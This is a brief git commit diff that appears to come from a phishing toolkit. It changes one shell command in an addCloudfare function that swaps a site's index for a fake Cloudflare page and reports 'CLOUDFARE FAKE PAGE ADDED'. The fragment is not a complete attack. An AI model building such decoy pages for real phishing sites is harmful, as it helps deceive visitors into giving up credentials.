little fix

#421
This commit is contained in:
AnonUD4Y 2019-11-06 11:27:02 +00:00 committed by GitHub
parent 0856834101
commit 4577b8a921
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -601,7 +601,7 @@ def addingCloudfare():
sleep(1)
def addCloudfare():
system('cp Server/www/index.* Server/www/home.php && cp WebPages/cloudfare.html Server/www/index.html')
system('mv Server/www/index.* Server/www/home.php && cp WebPages/cloudfare.html Server/www/index.html')
print(_("\n{0}[{1}#{0}]CLOUDFARE FAKE PAGE{0} ADDED...").format(MAIN0, MAIN4))
sleep(2)